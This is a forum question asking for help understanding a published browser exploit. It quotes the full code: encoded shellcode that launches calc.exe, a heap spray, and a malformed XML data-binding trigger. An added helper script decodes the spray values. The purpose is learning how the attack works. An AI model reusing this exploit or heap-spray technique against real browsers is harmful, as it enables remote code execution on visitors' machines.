Help me understand this JavaScript exploit
<p>I usually do not have difficulty reading JavaScript, but I can't figure out the logic of this one. The code is from an exploit that was published 4 days ago. You can find it at <a href="http://www.milw0rm.com/exploits/7477" rel="noreferrer">milw0rm</a>.</p>

<p>Here is the code:</p>

<pre><code>&lt;html&gt;
&lt;div id="replace"&gt;x&lt;/div&gt;
&lt;script&gt;
// windows/exec - 148 bytes
// http://www.metasploit.com
// Encoder: x86/shikata_ga_nai
// EXITFUNC=process, CMD=calc.exe
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

// ugly heap spray, the d0nkey way!
// works most of the time
var spray = unescape("%u0a0a%u0a0a");

do {
    spray += spray;
} while(spray.length &lt; 0xd0000);

memory = new Array();

for(i = 0; i &lt; 100; i++)
    memory[i] = spray + shellcode;

xmlcode = "&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;image SRC=http://&amp;#x0a0a;&amp;#x0a0a;.example.com&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;XML ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;";

tag = document.getElementById("replace");
tag.innerHTML = xmlcode;

&lt;/script&gt;
&lt;/html&gt;
</code></pre>

<p>Here is what I believe it does, and I would like you to help me with the parts that I misunderstand.</p>

<p>The variable <code>shellcode</code> contains the code to open calc.exe. I do not get how they found that weird string... any idea?</p>

<p>The second thing is the variable <code>spray</code>. I do not understand this weird loop.</p>

<p>The third thing is the variable <code>memory</code>, which is never used anywhere; why do they create it?</p>

<p>Last thing: what does the XML tag do in the page?</p>

<h2>Update</h2>

<p>Alright, for the moment I have good answers, but they are mostly very general. I would like more explanation of the values in the code. An example is <code>unescape("%u0a0a%u0a0a");</code>. What does it mean? Same thing for the loop: why did the developer write <code>length &lt; 0xd0000</code>? I would like a deeper understanding, not only the theory of this code.</p>
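Added illustration (editor's code, not part of the question or of the exploit it quotes): a small JavaScript helper that decodes the `%uXXXX` form accepted by `unescape()` and models the doubling loop arithmetically, so the two values asked about in the update, `%u0a0a%u0a0a` and `0xd0000`, can be checked on paper without running the page. Function names and the sample inputs are my own.

```javascript
// Decode the %uXXXX escapes that unescape() accepts into UTF-16 code units.
// Only the %u form is handled, which is the only form the posted script uses.
function decodeUnicodeEscapes(s) {
  const units = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let m;
  while ((m = re.exec(s)) !== null) units.push(parseInt(m[1], 16));
  return units;
}

// The bytes a JavaScript engine stores for those code units (UTF-16LE),
// which is what matters once the heap is later read as raw memory.
function toLittleEndianBytes(units) {
  const bytes = [];
  for (const u of units) bytes.push(u & 0xff, (u >> 8) & 0xff);
  return bytes;
}

// Model of `do { spray += spray; } while (spray.length < limit);` done with
// arithmetic instead of allocation. seedUnits is the decoded seed length
// (2 for "%u0a0a%u0a0a"); blocks is the loop count of the memory array.
function sprayStats(seedUnits, limit, blocks) {
  let len = seedUnits;
  let iterations = 0;
  do { len *= 2; iterations++; } while (len < limit);
  return {
    iterations,
    unitsPerBlock: len,
    bytesPerBlock: len * 2,        // two bytes per UTF-16 code unit
    totalBytes: len * 2 * blocks,  // the shellcode appended per block is not counted
  };
}

// Distinct 32-bit little-endian values seen when the buffer is read at every
// byte offset. A buffer of 0x0a bytes yields one value, 0x0a0a0a0a, at any
// alignment, which is why the filler and the address in the XML are the same.
function distinctDwords(bytes) {
  const seen = new Set();
  for (let i = 0; i + 4 <= bytes.length; i++) {
    seen.add((bytes[i] | (bytes[i + 1] << 8) | (bytes[i + 2] << 16) | (bytes[i + 3] << 24)) >>> 0);
  }
  return [...seen];
}

// Run on the values from the question (constructed sample input).
const seed = decodeUnicodeEscapes("%u0a0a%u0a0a");  // [0x0a0a, 0x0a0a]
const stats = sprayStats(seed.length, 0xd0000, 100); // 19 doublings, 2 MiB per block
console.log(seed.map(u => u.toString(16)), stats,
            distinctDwords(toLittleEndianBytes(seed)).map(v => v.toString(16)));
```

Note that 0xd0000 is only the threshold that stops the doubling: the string actually ends at the next power of two, 0x100000 code units, and with 100 copies the script asks for roughly 200 MiB of heap.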